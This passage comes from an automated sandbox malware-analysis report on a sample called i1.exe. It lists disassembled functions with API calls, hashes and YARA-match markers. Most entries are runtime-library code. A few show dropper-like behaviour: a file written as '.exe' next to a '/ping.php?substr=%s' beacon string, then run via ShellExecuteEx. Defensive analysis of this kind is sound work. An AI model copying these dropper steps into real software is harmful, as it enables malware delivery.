Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: a53c037777d8b1b2115bf159d204196ca41bb946c20c2e3f835a11376dbc8933
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05CA52CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 05CA533C
_free.LIBCMT ref: 05CA535C

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a53c037777d8b1b2115bf159d204196ca41bb946c20c2e3f835a11376dbc8933
Instruction ID: 6597476a821866c9c24bdb4d1fa0d3aea14c94f3734dddad69e71f1dab9f511b
Opcode Fuzzy Hash: a53c037777d8b1b2115bf159d204196ca41bb946c20c2e3f835a11376dbc8933
Instruction Fuzzy Hash: 4A41D337B012009FDF14DF78C884A6DBBB2FF85718B1589A9D556EB290DB71AA05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 05CAE66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 05CAE673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05CAE696

Part of subcall function 05CA7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CA7CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05CAE6BC
_free.LIBCMT ref: 05CAE6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05CAE6DE

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: 2f12ee93f39e2921a0ef2e8660128ed1acadbe4b62c25781fdeae8b811deca62
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: E301DF7370561F7F27311AB65C8CCBB7E6DEAC2AA83140D39F905D2100EE618E0291F9

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 05CA7004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,05CA25ED,05CA7307,?,05CA6FAE,00000001,00000364,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA7009
_free.LIBCMT ref: 05CA703E
_free.LIBCMT ref: 05CA7065
SetLastError.KERNEL32(00000000), ref: 05CA7072
SetLastError.KERNEL32(00000000), ref: 05CA707B

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: d73a91a0436499b2548f7ee8c901141873a1eb9bdc20566d8ce7c9333b612d1d
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: AB0126377406032B823267752C88E6F2E9AFBC02797210D34F41692280EE2489028064

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 05CAEFD5 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 05CAEFED

Part of subcall function 05CA6501: HeapFree.KERNEL32(00000000,00000000,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?), ref: 05CA6517
Part of subcall function 05CA6501: GetLastError.KERNEL32(?,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?,?), ref: 05CA6529

_free.LIBCMT ref: 05CAEFFF
_free.LIBCMT ref: 05CAF011
_free.LIBCMT ref: 05CAF023
_free.LIBCMT ref: 05CAF035

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: 7a6549de7ad49d61bd4250c1ccdc255a02debe2725f90362fc4164e3456f1128
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: C8F012779182026FCA34DBA8F8C9C177BD9BA04758B591C19F0C6D7500CB31FAC19665

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 05CA5519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05CA5537

Part of subcall function 05CA6501: HeapFree.KERNEL32(00000000,00000000,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?), ref: 05CA6517
Part of subcall function 05CA6501: GetLastError.KERNEL32(?,?,05CAF288,?,00000000,?,00000000,?,05CAF52C,?,00000007,?,?,05CAF920,?,?), ref: 05CA6529

_free.LIBCMT ref: 05CA5549
_free.LIBCMT ref: 05CA555C
_free.LIBCMT ref: 05CA556D
_free.LIBCMT ref: 05CA557E

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: a0558d82a936d14b2868340ca6b63684805b8711e9b4aec7b88a430ff5c5c175
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 4FF030B2D111119FCA27AF54FC446153F62FB04614316B96EF14552278CF364791AFCA

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041D721 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0041D770
_free.LIBCMT ref: 0041D88D

Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,004390A0,0041D29D,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D

Strings

*?, xrefs: 0041D764
., xrefs: 0041DA44

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 3e7ab2acfc700722c65f25e963b3ffec5a7bf3beb8922ea61622f305851d44eb
Instruction ID: ecd8b5256a954c25838a73366a1b3394fcd436117d861706b95123fff02031d2
Opcode Fuzzy Hash: 3e7ab2acfc700722c65f25e963b3ffec5a7bf3beb8922ea61622f305851d44eb
Instruction Fuzzy Hash: E451B3B1E00209AFDF14DFA9C881AEEF7B5EF98314F24416EE854E7341E6399E418B54

Uniqueness

Uniqueness Score: -1.00%

Function 05CAD988 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 05CAD9D7
_free.LIBCMT ref: 05CADAF4

Part of subcall function 05CA0B99: IsProcessorFeaturePresent.KERNEL32(00000017,05CA0B6B,00000016,05CA2DA0,0000002C,004390A0,05CAD504,?,?,?,05CA0B78,00000000,00000000,00000000,00000000,00000000), ref: 05CA0B9B
Part of subcall function 05CA0B99: GetCurrentProcess.KERNEL32(C0000417,05CA2DA0,00000016,05CA7003), ref: 05CA0BBD
Part of subcall function 05CA0B99: TerminateProcess.KERNEL32(00000000), ref: 05CA0BC4

Strings

., xrefs: 05CADCAB
*?, xrefs: 05CAD9CB

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 3e7ab2acfc700722c65f25e963b3ffec5a7bf3beb8922ea61622f305851d44eb
Instruction ID: 1e5de8a496a7f33134a6268492cfbfa6f4edce6e0659315d46c795501df384ac
Opcode Fuzzy Hash: 3e7ab2acfc700722c65f25e963b3ffec5a7bf3beb8922ea61622f305851d44eb
Instruction Fuzzy Hash: 3351D376E0420AAFDF14DFA8C884ABDBBB5FF48318F288569D456E7704E6719E01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\i1.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\AppData\Local\Temp\i1.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\i1.exe
API String ID: 2506810119-3777645852
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 05CA352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\i1.exe,00000104), ref: 05CA356A
_free.LIBCMT ref: 05CA3635
_free.LIBCMT ref: 05CA363F

Strings

C:\Users\user\AppData\Local\Temp\i1.exe, xrefs: 05CA3561, 05CA3568, 05CA3597, 05CA35CF

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\i1.exe
API String ID: 2506810119-3777645852
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: 33462058e1bba1f795a205c3654d50421405cd44c288bf65022faeb6fdb92203
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 8831B3B2E04299AFDB21DF999C84DAEBFFCFB84B14F104866E50597210DB708A40DB94

Uniqueness

Uniqueness Score: -1.00%

Function 05CB6777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 05CB67B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 05CB67CD
CloseHandle.KERNEL32(?), ref: 05CB67D6

Strings

.exe, xrefs: 05CB6782

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: c2f6a4f03c0b6168b32d1829b41051feee1775aff550a2dfd5906224e562dd26
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 31017C31E0021CEBDF15DFA9E8459DDBBF8FF08640F008126F841A6260EB709A45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 05CB64A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05CB5B74,00000001,?,/ping.php?substr=%s), ref: 05CB64C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05CB5B74,00000001,?,/ping.php?substr=%s,?), ref: 05CB64DC
CloseHandle.KERNEL32(00000000,?,05CB5B74,00000001,?,/ping.php?substr=%s,?), ref: 05CB64E5

Strings

.exe, xrefs: 05CB64AE

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1f082eb5b52680383938e18c237e932bb7847e19351f1e3d24da0cf6ad0c17b3
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 32E06572601124BBD7351B999C48FA7BE6CEF855A0F040125FB05D211096A1DD0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 05CA7FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 05CA8061
__alldvrm.LIBCMT ref: 05CA8262
__alldvrm.LIBCMT ref: 05CA8284

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: d14c61f86d8a33cc4d98349d938eec38265756a67294eda8178c1c82373c080b
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 02A16673E047879FEB25CF28C884BBABFE5FF11358F144A69D5859B281D2388A41C750

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 05CB2AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05CB2C05

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: fa0a4f4c56fdf6a7ada57a7b4b5e299ebaa7cad45e07465e74a85006b4dfcd14
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 09411B3AB041166BFB256EB88C89EFE3EBAFF05374F140E15F419D6190DEF48941A261

Uniqueness

Uniqueness Score: -1.00%

Function 05CAB567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05CA4002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05CAB5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05CAB63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05CAB64F
__freea.LIBCMT ref: 05CAB658

Part of subcall function 05CA7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CA7CDE

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: df90d3e9cad1ddcc1f61869410a4192af249b680854c70b3286edc5ba9d1e035
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: CC31B072A0020AABDF28DF65DC48DEE7BA5EB80218F040629EC19D7150EB35CD60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
